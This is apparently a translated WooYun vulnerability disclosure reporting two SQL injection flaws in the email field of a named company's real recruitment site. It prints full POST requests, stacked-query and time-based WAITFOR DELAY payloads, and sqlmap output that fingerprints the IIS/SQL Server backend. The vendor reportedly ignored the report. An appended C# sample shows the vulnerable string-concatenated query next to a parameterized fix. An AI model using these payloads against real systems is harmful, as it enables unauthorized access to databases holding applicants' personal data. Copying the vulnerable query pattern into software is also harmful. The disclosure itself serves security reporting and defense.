
Vulnerability summary

Defect ID: wooyun-2015-0103677

Title: Two SQL injection vulnerabilities in the campus recruitment website of Beijing Foreign Enterprise Human Resources Company (FESCO)

Vendor: Beijing Foreign Enterprise Human Resources Service Co., Ltd. (北京外企人力资源服务有限公司)

Author: ucifer

Submitted: 2015-03-25 18:47

Fix time: 2015-03-30 18:48

Public disclosure time: 2015-03-30 18:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-03-25: Details sent to the vendor; awaiting vendor action
2015-03-30: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Both are POST injections.

Detailed description:

http://career.fesco.com.cn/register
post.txt is as follows:

POST /register HTTP/1.1
Host: career.fesco.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://career.fesco.com.cn/register
Cookie: lzstat_uv=62988003890204689|2631557; lzstat_ss=3083602118_1_1427296096_2631557
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 358
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTIxNDU3MjI1OTVkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQZCdG5SZWdq7Gednoo9Pgy47dsVj6rKnVrnRcQ1prlVFELq3aXpNQ%3D%3D&__VIEWSTATEGENERATOR=799CC77D&txtEmail=123%40qq.com&txtEmail%24CVS=&txtPwd=123&txtPwd%24CVS=&txtRePwd=123&txtRePwd%24CVS=&BtnReg=&DXScript=1_32%2C1_61%2C2_22%2C2_29%2C2_15&BtnReg=


The txtEmail parameter is vulnerable to time-based blind injection:

Place: POST
Parameter: txtEmail
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTIxNDU3MjI1OTUPZBYCAgMPZBYGAgMPPCsABQEADxYCHgVWYWx1ZQUKMTIzQHFxLmNvbWRkAgcPPCsABQEADxYCHwAFAzEyM2RkAgsPPCsABQEADxYCHwAFAzEyM2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQZCdG5SZWeh0Oe9ObWv8nnLkqPV3sKbSENeljlu0gZjlitiEHnM6g==&__VIEWSTATEGENERATOR=799CC77D&txtEmail=123@qq.com'; WAITFOR DELAY '0:0:5'--&txtEmail$CVS=&txtPwd=123&txtPwd$CVS=&txtRePwd=123&txtRePwd$CVS=&BtnReg=&DXScript=1_32,1_61,2_22,2_29,2_15&BtnReg=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTIxNDU3MjI1OTUPZBYCAgMPZBYGAgMPPCsABQEADxYCHgVWYWx1ZQUKMTIzQHFxLmNvbWRkAgcPPCsABQEADxYCHwAFAzEyM2RkAgsPPCsABQEADxYCHwAFAzEyM2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQZCdG5SZWeh0Oe9ObWv8nnLkqPV3sKbSENeljlu0gZjlitiEHnM6g==&__VIEWSTATEGENERATOR=799CC77D&txtEmail=123@qq.com' WAITFOR DELAY '0:0:5'--&txtEmail$CVS=&txtPwd=123&txtPwd$CVS=&txtRePwd=123&txtRePwd$CVS=&BtnReg=&DXScript=1_32,1_61,2_22,2_29,2_15&BtnReg=
---


http://career.fesco.com.cn/login
post.txt is as follows:

POST /login HTTP/1.1
Host: career.fesco.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://career.fesco.com.cn/login
Cookie: lzstat_uv=62988003890204689|2631557; lzstat_ss=3083602118_1_1427296096_2631557; ASP.NET_SessionId=rvs3g4n4l4rsazuyn4alo3hn
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 347
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTcyNTQzNTgyOGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCEJ0bkxvZ2luBQZCdG5SZWfVy4voYCNxsXJNA1%2BF4nFBOmWUIZztmbLwXvZBUSJ92g%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&txtEmail=111%40qq.com&txtEmail%24CVS=&txtPwd=111&txtPwd%24CVS=&BtnLogin=&DXScript=1_32%2C1_61%2C2_22%2C2_29%2C2_15&BtnLogin=


The txtEmail parameter is vulnerable to time-based blind injection:

Place: POST
Parameter: txtEmail
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTcyNTQzNTgyOA9kFgICAw9kFgQCAw88KwAFAQAPFgIeBVZhbHVlBQoxMTFAcXEuY29tZGQCBw88KwAFAQAPFgIfAAUDMTExZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCEJ0bkxvZ2luBQZCdG5SZWcicURw8hfZVrVqmEn7Wpvpg4q5tzRVv+cbykSGL1YsXg==&__VIEWSTATEGENERATOR=C2EE9ABB&txtEmail=111@qq.com'; WAITFOR DELAY '0:0:5'--&txtEmail$CVS=&txtPwd=111&txtPwd$CVS=&BtnLogin=&DXScript=1_32,1_61,2_22,2_29,2_15&BtnLogin=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTcyNTQzNTgyOA9kFgICAw9kFgQCAw88KwAFAQAPFgIeBVZhbHVlBQoxMTFAcXEuY29tZGQCBw88KwAFAQAPFgIfAAUDMTExZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCEJ0bkxvZ2luBQZCdG5SZWcicURw8hfZVrVqmEn7Wpvpg4q5tzRVv+cbykSGL1YsXg==&__VIEWSTATEGENERATOR=C2EE9ABB&txtEmail=111@qq.com' WAITFOR DELAY '0:0:5'--&txtEmail$CVS=&txtPwd=111&txtPwd$CVS=&BtnLogin=&DXScript=1_32,1_61,2_22,2_29,2_15&BtnLogin=
---
[16:01:43] [INFO] testing Microsoft SQL Server
[16:01:43] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[16:01:48] [INFO] confirming Microsoft SQL Server
[16:02:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008


Proof of vulnerability:

Enumerating databases:

(screenshot: QQ截图20150325161552.png)


Current database user:

(screenshot: QQ截图20150325163834.png)


Fix:

You know what to do.
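As an added illustration, not the site's code (the report shows no server-side source): the ASP.NET pattern that lets a txtEmail value reach SQL Server unparameterized, beside the parameterized form that closes both findings. The table and column names (Users, Email, Pwd) and the connection string are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;   // Microsoft.Data.SqlClient exposes the same API

// Hypothetical illustration of the reported bug class, not the vendor's code.
public static class LoginRepository
{
    // VULNERABLE: the form field is spliced into the SQL text. A txtEmail value of
    //   123@qq.com'; WAITFOR DELAY '0:0:5'--
    // closes the string literal, terminates the statement and appends a second one.
    // SqlCommand sends the whole text to SQL Server as one batch, so the stacked
    // statement runs and the 5-second delay is the oracle sqlmap reported above.
    public static bool UserExistsUnsafe(string connStr, string txtEmail, string txtPwd)
    {
        string sql = "SELECT COUNT(*) FROM Users WHERE Email = '" + txtEmail +
                     "' AND Pwd = '" + txtPwd + "'";
        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            conn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // FIXED: the SQL text is a constant; user-supplied values travel as typed
    // parameters, so a quote, semicolon or comment marker in txtEmail is plain
    // data and cannot change the statement structure. (Storing the password as
    // a salted hash instead of plaintext is a separate, also necessary, fix.)
    public static bool UserExistsSafe(string connStr, string txtEmail, string txtPwd)
    {
        const string sql =
            "SELECT COUNT(*) FROM Users WHERE Email = @email AND Pwd = @pwd";
        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@email", SqlDbType.NVarChar, 256).Value = txtEmail;
            cmd.Parameters.Add("@pwd", SqlDbType.NVarChar, 256).Value = txtPwd;
            conn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

The same change applies to the /register handler, since sqlmap reported the identical stacked-query and time-based findings on its txtEmail field.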

Copyright notice: when reposting, please credit the source: ucifer@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: No impact; ignored by the vendor

Ignored at: 2015-03-30 18:48

Vendor reply:

Latest status:

None yet